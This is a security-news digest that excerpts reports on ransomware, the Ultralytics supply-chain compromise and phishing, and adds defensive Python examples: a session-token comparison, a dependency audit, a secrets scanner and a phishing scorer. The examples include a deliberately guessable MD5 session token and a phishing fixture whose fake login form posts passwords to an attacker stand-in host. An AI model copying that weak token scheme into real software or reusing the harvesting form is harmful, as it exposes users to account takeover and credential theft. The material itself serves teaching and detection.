from The Cyber Express
Last month’s attack on supply chain management platform Blue Yonder has been attributed to a new ransomware group known as “Termite.” The Cyble researchers said Termite ransomware is “a new and growing threat in the cyber landscape, leveraging advanced tactics such as double extortion to maximize its impact on victims.” The full Cyble blog digs deep into Termite ransomware’s processes, including indicators of compromise (IoCs) and MITRE ATT&CK techniques...
from thexssrat @ Medium
APIs (Application Programming Interfaces) are integral to modern applications, facilitating communication between services and enabling rich user experiences. This article provides a comprehensive technical overview of Broken Authentication vulnerabilities in APIs, methods to test for them, and strategies to integrate their detection into your bug bounty methodology. Exploit Implementation Flaws: Leverage weaknesses like improper password handling or insecure session management...
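Added example (not code from the Medium article): the kind of implementation flaw the excerpt tells testers to look for, a guessable, never-expiring session token, placed next to a hardened session store with OS-CSPRNG tokens, server-side expiry and revocation, and constant-time password verification. The names (weak_login, SessionStore, hash_password) and the PBKDF2 round count are this example's own choices, not any product's.

```python
"""Broken authentication in an API: a weak session scheme beside a hardened one.
Constructed example; names and parameters are this example's own."""
import hashlib
import hmac
import secrets
import time
from typing import Dict, Optional, Tuple

# ---------- Weak pattern: what a tester hopes to find ----------
_weak_sessions: Dict[str, str] = {}

def weak_login(user_id: str, now: Optional[float] = None) -> str:
    """Token = MD5("user:hour"). Anyone who knows the user id can recompute
    the token for the current hour, and nothing ever invalidates it."""
    hour = int((time.time() if now is None else now) // 3600)
    token = hashlib.md5(f"{user_id}:{hour}".encode()).hexdigest()
    _weak_sessions[token] = user_id
    return token

def weak_check(token: str) -> Optional[str]:
    return _weak_sessions.get(token)          # no expiry, no revocation

# ---------- Hardened pattern ----------
PBKDF2_ROUNDS = 200_000   # example value; tune so one check costs ~100 ms on your hardware

def hash_password(password: str, salt: Optional[bytes] = None) -> Tuple[bytes, bytes]:
    """Salted PBKDF2-HMAC-SHA256; returns (salt, digest) for storage."""
    salt = salt if salt is not None else secrets.token_bytes(16)
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, PBKDF2_ROUNDS)
    return salt, digest

def verify_password(password: str, salt: bytes, expected: bytes) -> bool:
    candidate = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, PBKDF2_ROUNDS)
    return hmac.compare_digest(candidate, expected)   # constant-time comparison

class SessionStore:
    """Bearer tokens from the OS CSPRNG, stored only as SHA-256 digests,
    with a server-side TTL and explicit revocation."""

    def __init__(self, ttl_seconds: int = 900, clock=time.time):
        self.ttl = ttl_seconds
        self.clock = clock                     # injectable for tests
        self._sessions: Dict[str, Tuple[str, float]] = {}

    @staticmethod
    def _key(token: str) -> str:
        # Hash before lookup: a timing difference in the dict lookup reveals
        # nothing useful about the bearer token, and a leaked store does not
        # hand out usable tokens.
        return hashlib.sha256(token.encode()).hexdigest()

    def login(self, user_id: str) -> str:
        token = secrets.token_urlsafe(32)      # 256 bits of entropy, URL-safe
        self._sessions[self._key(token)] = (user_id, self.clock() + self.ttl)
        return token

    def check(self, token: str) -> Optional[str]:
        key = self._key(token)
        entry = self._sessions.get(key)
        if entry is None:
            return None
        user_id, expires_at = entry
        if self.clock() >= expires_at:
            self._sessions.pop(key, None)      # expired: drop it so it cannot be replayed
            return None
        return user_id

    def logout(self, token: str) -> None:
        self._sessions.pop(self._key(token), None)   # server-side revocation

if __name__ == "__main__":
    t = weak_login("alice", now=3_600_000.0)
    print("weak token recomputed by attacker:", t == hashlib.md5(b"alice:1000").hexdigest())
    store = SessionStore(ttl_seconds=60)
    tok = store.login("bob")
    print("hardened check:", store.check(tok))
    store.logout(tok)
    print("after logout:", store.check(tok))
```

When testing an API, the weak half is the behaviour to probe for: log in twice and compare tokens, reuse a token after logout, and check whether an old token still works hours later. The hardened half is what a fix should look like: unpredictable tokens, expiry enforced by the server rather than the client, and revocation that actually removes state.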
from Dark Reading
It's a useful tool, as Microsoft pointed out in its expansion announcement on Dec. 6: "It's now possible to quickly find and get back to apps, websites, images, or documents just by describing its content." The tech giant appears to be taking those concerns seriously; in June, it beefed up its planned privacy and security features for Recall, including data encryption, turning Recall off by default, and requiring users to enroll in Windows Hello biometrics authentication to prove they're presen...
from Rapid7 Blog
It adds 9 new modules, which will get you remote code execution on products such as Ivanti Connect Secure, VMware vCenter Server, Asterisk, Fortinet FortiManager and Acronis Cyber Protect. Description: This adds a new X11 library and module that uses it to remotely capture key presses from open X servers. Description: Adds an exploit module for a CRLF injection vulnerability in Ivanti Connect Secure to achieve remote code execution...
from CrowdStrike Blog
Cloud-native applications, often overlooked in cloud security strategies, have become prime targets as organizations grow more reliant on them. This visibility encompasses all microservices, APIs, data flows and dependencies, providing a comprehensive view of application architectures. Finally, the process is real-time and continuous, making it useful for understanding applications as they exist in production...
from BleepingComputer
For Google Colab accounts, owners got flagged and banned due to "abusive activity." "We confirm that Ultralytics versions 8.3.41 and 8.3.42 were compromised by a malicious code injection targeting cryptocurrency mining. Our team is conducting a full security audit and implementing additional safeguards to prevent similar incidents."...
from The Register - Security
Section 105 requires a carrier to make certain that any interception of communications can only be carried out with lawful authorization. The FCC also wants these network service providers to submit an annual certification attesting they have created, updated, and implemented a cybersecurity risk management plan. The situation is so dire the US Cybersecurity and Infrastructure Security Agency (CISA) issued guidance this week including advice on using encrypted messaging to protect information –...
from The Record by Recorded Future
Panasonic-owned software giant Blue Yonder said several of its customers’ systems are back up and running, as the gang allegedly behind the incident came forward on Friday to boast about troves of stolen data. At least one security firm said Blue Yonder had been attacked by another ransomware gang in 2021...
from CrowdStrike Blog
Cloud security solutions must also deliver real-time threat detection and automated response to stay ahead of rapidly evolving threats. Our recent acquisitions of Bionic (ASPM), Flow Security (DSPM) and Adaptive Shield (SSPM) will further expand our capabilities to help customers protect their data and reduce application risk in the cloud. CrowdStrike’s growth trajectory speaks to the trust that organizations place in Falcon Cloud Security...
from BleepingComputer
The Termite ransomware gang has officially claimed responsibility for the November breach of software as a service (SaaS) provider Blue Yonder. Its list of over 3,000 customers includes other high-profile companies like Microsoft, Renault, Bayer, Tesco, Lenovo, DHL, 3M, Ace Hardware, Procter & Gamble, Carlsberg, Dole, Walgreens, Western Digital, and 7-Eleven. BleepingComputer had previously heard that Termite was behind the attack on Blue Yonder, but this could not be independently confirmed...
from ReversingLabs
Finally, a clean version, 8.3.43, was published on the same day, resolving this supply chain attack. This supply chain compromise had the potential to impact a huge number of users since ultralytics (see RL Spectra Assure Community listing) is a GitHub project with more than 30,000 stars — and the PyPI package shows about 60 million downloads. But it is not hard to imagine what the potential impact and the damage could be if threat actors decided to plant more aggressive malware like backdoors o...
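The practical follow-up to both Ultralytics items above is checking your own dependency manifests for the affected releases. The script below is an added example, not ReversingLabs' or Ultralytics' code; the only facts it takes from the reports are the release numbers (8.3.41 and 8.3.42 carried the injected code, 8.3.43 is the clean follow-up). It flags three things: an exact pin to a compromised release, a non-exact specifier that a resolver could satisfy with one, and an exact pin without a --hash entry. The sample requirements file is constructed.

```python
"""Audit a requirements file for a compromised dependency release.
Added example; the sample requirements and COMPROMISED table are constructed
from the release numbers reported above."""
import re
from typing import Dict, List, Set, Tuple

# Known-bad releases, keyed by the normalized project name pip uses.
COMPROMISED: Dict[str, Set[str]] = {
    "ultralytics": {"8.3.41", "8.3.42"},
}

# name, optional [extras], optional version specifier (===, ==, !=, ~=, >=, <=, >, <)
_REQ_LINE = re.compile(
    r"^(?P<name>[A-Za-z0-9][A-Za-z0-9._-]*)"
    r"(?:\[[^\]]*\])?"
    r"\s*(?P<spec>(?:===|[=!<>~]=?)\s*[^;#\s]+)?"
)

def normalize(name: str) -> str:
    """PEP 503 normalization: case-fold and collapse runs of -, _ and . to '-'."""
    return re.sub(r"[-_.]+", "-", name).lower()

def audit_requirements(text: str) -> List[Tuple[str, str, str]]:
    """Return (requirement line, project, finding) for each line that pins a
    compromised release, is not pinned exactly (so the resolver may pick one),
    or is pinned without a --hash (so a republished artifact could be swapped)."""
    findings = []
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()          # drop comments
        if not line or line.startswith("-"):         # blank or pip option (-r, -e, --index-url)
            continue
        m = _REQ_LINE.match(line)
        if not m:
            continue
        project = normalize(m.group("name"))
        bad = COMPROMISED.get(project)
        if not bad:
            continue
        spec = (m.group("spec") or "").replace(" ", "")
        if spec.startswith("==") and not spec.startswith("==="):
            version = spec[2:]
            if version in bad:
                findings.append((line, project, f"pinned to compromised release {version}"))
            elif "--hash=" not in line:
                findings.append((line, project,
                                 "pinned but without --hash; add hashes so a swapped artifact fails to install"))
        else:
            shown = spec or "any version"
            findings.append((line, project,
                             f"not pinned exactly ({shown}); resolver may select {sorted(bad)}"))
    return findings

SAMPLE_REQUIREMENTS = """\
# constructed requirements.txt for this example
numpy==1.26.4
ultralytics==8.3.42
Ultralytics>=8.3.0      # same project, unpinned, to show the second finding
torch
"""

if __name__ == "__main__":
    for line, project, finding in audit_requirements(SAMPLE_REQUIREMENTS):
        print(f"{project:<12} {finding:<75} <- {line}")
```

Run it against each requirements file in CI and fail the build on any finding; the --hash warning is the durable fix, since a hash-pinned install refuses an artifact that differs from the one you audited even if the same version number is republished.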
from BleepingComputer
While 0patch is not sharing further details about the vulnerability, BleepingComputer understands that it forces an outbound NTLM connection to a remote share. PRO and Enterprise accounts have already received the security micropatch automatically unless their configuration explicitly prevents this. BleepingComputer has contacted Microsoft asking about the flaw and its plans to address it, but we are still waiting for a response...
from Horizon3.ai
While trivial, this attack path demonstrates the pervasive issue of poor data segmentation, especially with regard to file repositories such as network shares and cloud syncing solutions. User passwords or access keys are not the only types of credential to be found through data pilfering. NodeZero is able to analyze files from any source for secrets on a scale only possible through extensive automation...
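Added example of the automated secrets sweep the excerpt describes (this is not NodeZero's code). Named patterns catch the obvious credential shapes (AWS access key IDs, PEM private key blocks, GitHub tokens, password assignments); an entropy check on secret/token/key assignments catches values the patterns miss. The file names and contents are constructed; the AWS values are AWS's published documentation placeholders, not live keys. The entropy threshold is an assumption of this example.

```python
"""Secrets discovery over a file tree. Added example; sample files below are
constructed and the AWS values are AWS documentation placeholders."""
import math
import os
import re
from typing import Dict, List

PATTERNS = {
    "aws_access_key_id": re.compile(r"\b(?:AKIA|ASIA)[0-9A-Z]{16}\b"),
    "private_key_block": re.compile(r"-----BEGIN (?:RSA |EC |DSA |OPENSSH )?PRIVATE KEY-----"),
    "github_token": re.compile(r"\bgh[pousr]_[A-Za-z0-9]{36,}\b"),
    "password_assignment": re.compile(r"(?i)\b(?:password|passwd|pwd)\s*[:=]\s*['\"]?([^\s'\"]{6,})"),
}
# Generic "<something>secret/token/key = <long value>" for the entropy check
_GENERIC = re.compile(r"(?i)\b(\w*(?:secret|token|key)\w*)\s*[:=]\s*['\"]?([A-Za-z0-9+/=_-]{20,})")
ENTROPY_THRESHOLD = 3.5          # bits per character; an assumption of this example
MAX_BYTES = 1_000_000            # skip large files (binaries, archives)

def shannon_entropy(s: str) -> float:
    if not s:
        return 0.0
    n = len(s)
    return -sum(c / n * math.log2(c / n) for c in (s.count(ch) for ch in set(s)))

def redact(value: str) -> str:
    """Keep enough to triage, never the whole secret in the report."""
    return value[:4] + "..." + value[-2:] if len(value) > 8 else "..."

def scan_text(path: str, text: str) -> List[Dict[str, object]]:
    findings = []
    for lineno, line in enumerate(text.splitlines(), 1):
        hit = False
        for kind, rx in PATTERNS.items():
            for m in rx.finditer(line):
                hit = True
                value = m.group(1) if m.lastindex else m.group(0)
                findings.append({"path": path, "line": lineno, "kind": kind, "preview": redact(value)})
        if hit:
            continue                         # do not double-report a line a named pattern caught
        for m in _GENERIC.finditer(line):
            if shannon_entropy(m.group(2)) >= ENTROPY_THRESHOLD:
                findings.append({"path": path, "line": lineno,
                                 "kind": "high_entropy_" + m.group(1).lower(),
                                 "preview": redact(m.group(2))})
    return findings

def scan_files(files: Dict[str, str]) -> List[Dict[str, object]]:
    """Scan an in-memory mapping of path -> text (what a share crawler hands over)."""
    out = []
    for path, text in files.items():
        out.extend(scan_text(path, text))
    return out

def scan_tree(root: str) -> List[Dict[str, object]]:
    """Walk a mounted share or sync folder and scan every readable text file."""
    out = []
    for dirpath, _, names in os.walk(root):
        for name in names:
            path = os.path.join(dirpath, name)
            try:
                if os.path.getsize(path) > MAX_BYTES:
                    continue
                with open(path, "r", encoding="utf-8", errors="ignore") as fh:
                    out.extend(scan_text(path, fh.read()))
            except OSError:
                continue
    return out

SAMPLE_FILES = {   # constructed contents standing in for files found on a share
    "shares/finance/deploy_notes.txt": "Prod DB password = Sup3rS3cretPass!\nrotated last quarter\n",
    "shares/it/old_backup.env": ("AWS_ACCESS_KEY_ID=AKIAIOSFODNN7EXAMPLE\n"
                                 "AWS_SECRET_ACCESS_KEY=wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY\n"),
    "shares/eng/id_rsa": ("-----BEGIN OPENSSH PRIVATE KEY-----\n"
                          "b3BlbnNzaC1rZXktdjEAAAAA...\n"
                          "-----END OPENSSH PRIVATE KEY-----\n"),
    "shares/hr/readme.md": "Welcome to the team.\n",
}

if __name__ == "__main__":
    for f in scan_files(SAMPLE_FILES):
        print(f"{f['path']}:{f['line']} {f['kind']} {f['preview']}")
```

Point scan_tree at a mounted share to run it for real. The report deliberately stores only a redacted preview, so the scanner's own output does not become the next credential dump sitting on a share.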
from Dark Reading
The latest survey of software, known as Census III, found that packages for Python software and those meant to connect developers with specific cloud services — such as a toolkit for Amazon's Elastic Compute Cloud (EC2) or the API for connecting Go programs to Google Cloud — have become much more popular and, thus, critical to software development. As a result, the census breaks out npm downloads from those for other software ecosystems. The data does not address how often developers encounte...
from Invicti
While ostensibly free, open-source DAST tools can be resource-intensive to set up, run, integrate, and verify results, making them less suitable for organizations. In fact, several commercial DAST scanners are essentially ZAP wrappers that build on top of the open-source scan engine to make it more usable for organizations. Scan quality: Ensure the DAST tool can test a variety of web technologies and detect all common vulnerability types while also minimizing false positives...
from GBHackers On Security
Subject redaction, a tactic employed by threat actors to obfuscate malicious email content, was most prevalent in finance, insurance, manufacturing, mining, healthcare, and retail. Cofense Intelligence found a significant correlation between redacted subject lines and .HTM/.HTML attachments in credential phishing emails, which are often embedded with the recipient’s email address and mimic legitimate login pages, increasing the likelihood of successful attacks. Less common but still prevalent are ...
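Added detection example for the pattern described above (not Cofense's tooling): an uninformative subject paired with an .htm/.html attachment whose body embeds the recipient's own address, usually around a fake login form. Assumptions of this example: a "redacted" subject is treated as one with no letters or digits at all, the score weights and thresholds are arbitrary, and both sample messages are constructed. It expects messages parsed with Python's email.policy.default so recipient headers expose parsed addresses.

```python
"""Score an inbound message for redacted-subject + HTML-attachment credential
phishing. Added example; the two messages built below are constructed fixtures."""
import re
from email import message_from_bytes, policy
from email.message import EmailMessage
from typing import List, Tuple

HTML_NAME = re.compile(r"\.html?$", re.IGNORECASE)
PASSWORD_INPUT = re.compile(r"<input[^>]*type\s*=\s*['\"]?password", re.IGNORECASE)
WEIGHTS = {"subject_redacted": 1, "html_attachment": 1,
           "recipient_embedded_in_attachment": 2, "password_form_in_attachment": 2}

def subject_is_redacted(subject: str) -> bool:
    """Assumption of this example: no letters or digits means the subject was blanked out."""
    return re.search(r"[A-Za-z0-9]", subject or "") is None

def html_attachments(msg: EmailMessage) -> List[Tuple[str, str]]:
    """(filename, decoded body) for every HTML attachment, by extension or content type."""
    out = []
    for part in msg.iter_attachments():
        name = part.get_filename() or ""
        if HTML_NAME.search(name) or part.get_content_type() == "text/html":
            body = part.get_payload(decode=True) or b""
            out.append((name, body.decode("utf-8", errors="ignore")))
    return out

def recipients_of(msg: EmailMessage) -> set:
    found = set()
    for field in ("To", "Cc"):
        hdr = msg.get(field)
        if hdr is not None:                      # policy.default gives parsed addresses
            found.update(a.addr_spec.lower() for a in hdr.addresses)
    return found

def score_message(msg: EmailMessage) -> Tuple[str, int, List[str]]:
    reasons = []
    if subject_is_redacted(str(msg.get("Subject", ""))):
        reasons.append("subject_redacted")
    attachments = html_attachments(msg)
    if attachments:
        reasons.append("html_attachment")
    rcpts = recipients_of(msg)
    for _, body in attachments:
        lowered = body.lower()
        if any(r in lowered for r in rcpts):
            reasons.append("recipient_embedded_in_attachment")   # pre-filled victim identity
        if PASSWORD_INPUT.search(body):
            reasons.append("password_form_in_attachment")        # local fake login page
    reasons = sorted(set(reasons), key=list(WEIGHTS).index)
    score = sum(WEIGHTS[r] for r in reasons)
    verdict = "quarantine" if score >= 4 else "review" if score >= 2 else "deliver"
    return verdict, score, reasons

def score_raw(raw: bytes) -> Tuple[str, int, List[str]]:
    """Entry point for a raw RFC 5322 message as a gateway would hand it over."""
    return score_message(message_from_bytes(raw, policy=policy.default))

def _build(subject: str, to: str, html_body: str, html_name: str) -> bytes:
    """Construct a sample message (test fixture, not a captured email)."""
    msg = EmailMessage(policy=policy.default)
    msg["From"] = "billing@vendor.example"
    msg["To"] = to
    msg["Subject"] = subject
    msg.set_content("Please see the attached document.")
    msg.add_attachment(html_body, subtype="html", filename=html_name)
    return msg.as_bytes()

PHISH_RAW = _build(
    "", "Dana Ruiz <dana.ruiz@victim-corp.example>",
    '<html><body><form method="post" action="https://collect.attacker.example/p">'
    '<input name="user" value="dana.ruiz@victim-corp.example" readonly>'
    '<input type="password" name="pass"><button>Sign in</button></form></body></html>',
    "Invoice_Secure_View.HTML")
BENIGN_RAW = _build(
    "Q3 vendor onboarding forms", "dana.ruiz@victim-corp.example",
    "<html><body><h1>Onboarding</h1><p>Fill in the attached form and return it.</p></body></html>",
    "onboarding-form.html")

if __name__ == "__main__":
    for label, raw in (("phish", PHISH_RAW), ("benign", BENIGN_RAW)):
        print(label, score_raw(raw))
```

The two attachment-content signals carry the weight on purpose: an HTML attachment by itself is common in legitimate mail, but one that already contains the recipient's address next to a password field is the credential-harvesting page the excerpt describes, delivered without any link for a URL filter to inspect.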
from ZDNet | security RSS
Bitdefender can be a bit slow to set up, but once it's ready, the antivirus is unobtrusive and will only alert you as necessary. It is important to look for antivirus software and apps that not only attack existing threats, but prevent you from facing new ones, too. Instead, pairing reputable antivirus software with other security methods, including using VPNs, strong passwords, 2FA, and being mindful of phishing tactics, will serve you best...